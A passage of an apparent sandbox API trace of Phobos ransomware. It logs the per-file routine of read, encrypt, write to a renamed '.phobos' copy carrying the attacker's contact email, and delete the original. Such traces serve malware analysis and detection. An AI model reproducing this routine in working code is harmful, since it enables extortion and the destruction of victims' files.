[0201.720] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ywUAB7tw1kCil NHujS7.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ywuab7tw1kcil nhujs7.lnk")) returned 0x20 [0201.720] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ywUAB7tw1kCil NHujS7.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ywuab7tw1kcil nhujs7.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.720] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ywUAB7tw1kCil NHujS7.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ywuab7tw1kcil nhujs7.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.720] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.721] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.721] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ywUAB7tw1kCil NHujS7.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ywuab7tw1kcil nhujs7.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.721] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.722] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.722] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x14da, lpOverlapped=0x0) returned 1 [0201.723] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x14e0, dwBufLen=0x14e0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x14e0) returned 1 [0201.723] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x14e0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x14e0, lpOverlapped=0x0) returned 1 [0201.724] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0201.724] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.724] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60, dwBufLen=0x60 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x60) returned 1 [0201.724] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.724] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x112, lpOverlapped=0x0) returned 1 [0201.724] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.724] CloseHandle (hObject=0x124) returned 1 [0201.724] CloseHandle (hObject=0x178) returned 1 [0201.724] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ywUAB7tw1kCil NHujS7.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ywuab7tw1kcil nhujs7.lnk")) returned 1 [0201.725] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.725] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Z BKGrD4N.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\z bkgrd4n.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.725] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=3710) returned 1 [0201.725] CloseHandle (hObject=0x178) returned 1 [0201.725] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Z BKGrD4N.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\z bkgrd4n.lnk")) returned 0x20 [0201.726] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Z BKGrD4N.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\z bkgrd4n.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.726] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Z BKGrD4N.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\z bkgrd4n.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.726] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.726] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.726] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Z BKGrD4N.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\z bkgrd4n.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.726] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.726] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.726] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xe7e, lpOverlapped=0x0) returned 1 [0201.730] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xe80, dwBufLen=0xe80 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xe80) returned 1 [0201.730] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xe80, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xe80, lpOverlapped=0x0) returned 1 [0201.731] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0201.731] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.731] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0201.731] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.731] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0201.731] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.731] CloseHandle (hObject=0x178) returned 1 [0201.731] CloseHandle (hObject=0x124) returned 1 [0201.731] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Z BKGrD4N.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\z bkgrd4n.lnk")) returned 1 [0201.732] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.732] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zBP9e1bnfyQ.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\zbp9e1bnfyq.mkv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.735] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=743) returned 1 [0201.735] CloseHandle (hObject=0x124) returned 1 [0201.735] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zBP9e1bnfyQ.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\zbp9e1bnfyq.mkv.lnk")) returned 0x20 [0201.735] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zBP9e1bnfyQ.mkv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\zbp9e1bnfyq.mkv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.736] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zBP9e1bnfyQ.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\zbp9e1bnfyq.mkv.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.736] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.736] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.736] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zBP9e1bnfyQ.mkv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\zbp9e1bnfyq.mkv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.738] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.738] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.738] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x2e7, lpOverlapped=0x0) returned 1 [0201.775] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x2f0, dwBufLen=0x2f0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x2f0) returned 1 [0201.775] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x2f0, lpOverlapped=0x0) returned 1 [0201.775] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0201.775] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.775] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0201.775] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.775] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0201.776] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.776] CloseHandle (hObject=0x124) returned 1 [0201.776] CloseHandle (hObject=0x178) returned 1 [0201.776] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\zBP9e1bnfyQ.mkv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\zbp9e1bnfyq.mkv.lnk")) returned 1 [0201.777] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.777] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\compressed (zipped) folder.zfsendtotarget"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.777] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=3) returned 1 [0201.777] CloseHandle (hObject=0x178) returned 1 [0201.778] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\compressed (zipped) folder.zfsendtotarget")) returned 0x2020 [0201.778] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\compressed (zipped) folder.zfsendtotarget.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.778] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\compressed (zipped) folder.zfsendtotarget"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.778] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.778] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.778] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\compressed (zipped) folder.zfsendtotarget.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.779] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.779] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.779] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x3, lpOverlapped=0x0) returned 1 [0201.780] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x10, dwBufLen=0x10 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x10) returned 1 [0201.780] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x10, lpOverlapped=0x0) returned 1 [0201.781] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32868) returned 1 [0201.781] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.781] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x80, dwBufLen=0x80 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x80) returned 1 [0201.781] CryptDestroyKey (hKey=0xa32868) returned 1 [0201.781] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x132, lpOverlapped=0x0) returned 1 [0201.781] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.781] CloseHandle (hObject=0x178) returned 1 [0201.781] CloseHandle (hObject=0x124) returned 1 [0201.781] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\compressed (zipped) folder.zfsendtotarget")) returned 1 [0201.782] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.782] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop (create shortcut).desklink"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.783] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=7) returned 1 [0201.783] CloseHandle (hObject=0x124) returned 1 [0201.783] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop (create shortcut).desklink")) returned 0x2020 [0201.783] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop (create shortcut).desklink.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0201.783] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop (create shortcut).desklink"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0201.783] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.784] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0201.784] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop (create shortcut).desklink.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0201.784] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0201.784] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.784] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x7, lpOverlapped=0x0) returned 1 [0201.823] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x10, dwBufLen=0x10 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x10) returned 1 [0201.823] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x10, lpOverlapped=0x0) returned 1 [0201.824] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0201.824] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0201.824] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70, dwBufLen=0x70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70) returned 1 [0201.824] CryptDestroyKey (hKey=0xa32928) returned 1 [0201.824] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x122, lpOverlapped=0x0) returned 1 [0201.824] CryptDestroyKey (hKey=0xa328e8) returned 1 [0201.824] CloseHandle (hObject=0x124) returned 1 [0201.824] CloseHandle (hObject=0x178) returned 1 [0201.824] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Desktop (create shortcut).DeskLink" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\sendto\\desktop (create shortcut).desklink")) returned 1 [0201.826] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0201.826] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Documents.mydocs" 